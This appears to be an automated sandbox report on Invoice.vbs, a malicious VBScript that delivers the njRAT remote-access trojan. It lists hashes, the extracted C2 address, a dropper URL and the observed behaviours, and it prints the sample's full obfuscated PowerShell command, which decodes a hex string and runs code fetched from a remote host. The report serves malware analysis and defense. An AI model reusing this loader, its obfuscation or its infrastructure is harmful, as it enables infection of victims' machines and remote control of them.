Analysis
-
max time kernel
150s -
max time network
148s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
07-09-2021 12:37
Static task
static1
Behavioral task
behavioral1
Sample
Invoice.vbs
Resource
win7-en
windows7_x64
0 signatures
0 seconds
General
-
Target
Invoice.vbs
-
Size
2KB
-
MD5
157bd8f697377d2442ac93eda10dec94
-
SHA1
9e5b8e8d2349aaedcc7b93fee831990b1f6b8ad6
-
SHA256
dcd4d3f6173c2283b4ed18fcf810870db068d967b7deb0cc2bcf95db1d3fce11
-
SHA512
d86412ba6b642759af963285815b7f9679e6cff17baa78e6e3fa6b984c80179b334ed010d587649449ee4f643d2103722fe4c4805ee7bde59ac21ab3a14ee9b7
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
http://54.184.87.30/sd-bypass.txt
Extracted
Family
njrat
Version
v4.0
Botnet
Sun
C2
103.153.78.241:8871
Mutex
Windows
Attributes
-
reg_key
Windows
-
splitter
|-F-|
Signatures
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 7 1540 powershell.exe 15 1540 powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 1540 set thread context of 1092 1540 powershell.exe aspnet_compiler.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepid process 1540 powershell.exe 1540 powershell.exe 1540 powershell.exe -
Suspicious use of AdjustPrivilegeToken 28 IoCs
Processes:
powershell.exeaspnet_compiler.exedescription pid process Token: SeDebugPrivilege 1540 powershell.exe Token: SeDebugPrivilege 1092 aspnet_compiler.exe Token: 33 1092 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 1092 aspnet_compiler.exe Token: 33 1092 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 1092 aspnet_compiler.exe Token: 33 1092 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 1092 aspnet_compiler.exe Token: 33 1092 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 1092 aspnet_compiler.exe Token: 33 1092 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 1092 aspnet_compiler.exe Token: 33 1092 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 1092 aspnet_compiler.exe Token: 33 1092 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 1092 aspnet_compiler.exe Token: 33 1092 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 1092 aspnet_compiler.exe Token: 33 1092 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 1092 aspnet_compiler.exe Token: 33 1092 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 1092 aspnet_compiler.exe Token: 33 1092 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 1092 aspnet_compiler.exe Token: 33 1092 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 1092 aspnet_compiler.exe Token: 33 1092 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 1092 aspnet_compiler.exe -
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
WScript.exepowershell.exedescription pid process target process PID 1832 wrote to memory of 1540 1832 WScript.exe powershell.exe PID 1832 wrote to memory of 1540 1832 WScript.exe powershell.exe PID 1540 wrote to memory of 1092 1540 powershell.exe aspnet_compiler.exe PID 1540 wrote to memory of 1092 1540 powershell.exe aspnet_compiler.exe PID 1540 wrote to memory of 1092 1540 powershell.exe aspnet_compiler.exe PID 1540 wrote to memory of 1092 1540 powershell.exe aspnet_compiler.exe PID 1540 wrote to memory of 1092 1540 powershell.exe aspnet_compiler.exe PID 1540 wrote to memory of 1092 1540 powershell.exe aspnet_compiler.exe PID 1540 wrote to memory of 1092 1540 powershell.exe aspnet_compiler.exe PID 1540 wrote to memory of 1092 1540 powershell.exe aspnet_compiler.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Invoice.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $TRUMP ='http://54XXX184XXX87XXX30/sd-bypassXXXtxt'.Replace('XXX','.');$Shib='2%###%2###20###3d###27###%5###5%###%8###20###%3###%f###%9###%e###7%###2e###57###5%###%6###20###%3###%f###%9###%e###6c###%9###%f###53###%e###5%###27###2e###52###65###70###6c###61###63###65###28###27###%5###5%###%8###20###%3###%f###%9###%e###27###2c###27###6e###%5###27###29###2e###52###65###70###6c###61###63###65###28###27###5%###%6###20###%3###%f###%9###%e###27###2c###27###%5###62###%3###27###29###2e###52###65###70###6c###61###63###65###28###27###%f###53###27###2c###27###65###27###29###3b###2%###%3###%3###20###3d###20###27###%%###%f###53###20###%3###%f###%9###%e###20###%c###53###%f###53###%3###%f###%9###%e###6e###%7###27###2e###52###65###70###6c###61###63###65###28###27###53###20###%3###%f###%9###%e###20###27###2c###27###57###6e###27###29###2e###52###65###70###6c###61###63###65###28###27###53###%f###27###2c###27###6f###61###%%###27###29###2e###52###65###70###6c###61###63###65###28###27###%3###%f###%9###%e###27###2c###27###5%###72###%9###27###29###3b###2%###%1###20###3d###27###%9###60###%5###6f###73###20###%3###%f###%9###%e###60###57###60###%2###5%###%3###20###%3###%f###%9###%e###6a###60###%5###5%###%8###20###%3###%f###%9###%e###20###2%###%2###29###2e###2%###%3###%3###28###2%###5%###52###55###%d###50###29###27###2e###52###65###70###6c###61###63###65###28###27###6f###73###20###%3###%f###%9###%e###27###2c###27###58###28###6e###60###65###27###29###2e###52###65###70###6c###61###63###65###28###27###%2###5%###%3###20###%3###%f###%9###%e###27###2c###27###2d###%f###62###27###29###2e###52###65###70###6c###61###63###65###28###27###5%###%8###20###%3###%f###%9###%e###27###2c###27###60###63###60###5%###27###29###3b###26###28###27###%9###27###2b###27###%5###58###27###29###28###2%###%1###20###2d###%a###6f###69###6e###20###27###27###29###7c###26###28###27###%9###27###2b###27###%5###58###27###29###3b'.Replace('%','4');Invoke-Expression (-join ($Shib -split '###' | ? { $_ } | % { [char][convert]::ToUInt32($_,16) }))2⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/1092-164-0x0000000005950000-0x0000000005951000-memory.dmpFilesize
4KB
-
memory/1092-162-0x00000000053D0000-0x00000000053D1000-memory.dmpFilesize
4KB
-
memory/1092-167-0x0000000005C90000-0x0000000005C91000-memory.dmpFilesize
4KB
-
memory/1092-166-0x0000000005A90000-0x0000000005A91000-memory.dmpFilesize
4KB
-
memory/1092-153-0x0000000000400000-0x000000000040E000-memory.dmpFilesize
56KB
-
memory/1092-165-0x0000000005AC0000-0x0000000005AC1000-memory.dmpFilesize
4KB
-
memory/1092-163-0x0000000005E60000-0x0000000005E61000-memory.dmpFilesize
4KB
-
memory/1092-154-0x000000000040836E-mapping.dmp
-
memory/1540-124-0x000001BE7E3F0000-0x000001BE7E3F2000-memory.dmpFilesize
8KB
-
memory/1540-141-0x000001BE7E3F8000-0x000001BE7E3F9000-memory.dmpFilesize
4KB
-
memory/1540-152-0x000001BE7EDD0000-0x000001BE7EDD4000-memory.dmpFilesize
16KB
-
memory/1540-120-0x000001BE7E3B0000-0x000001BE7E3B1000-memory.dmpFilesize
4KB
-
memory/1540-114-0x0000000000000000-mapping.dmp
-
memory/1540-130-0x000001BE7E3F6000-0x000001BE7E3F8000-memory.dmpFilesize
8KB
-
memory/1540-125-0x000001BE7E3F3000-0x000001BE7E3F5000-memory.dmpFilesize
8KB
-
memory/1540-123-0x000001BE7EE10000-0x000001BE7EE11000-memory.dmpFilesize
4KB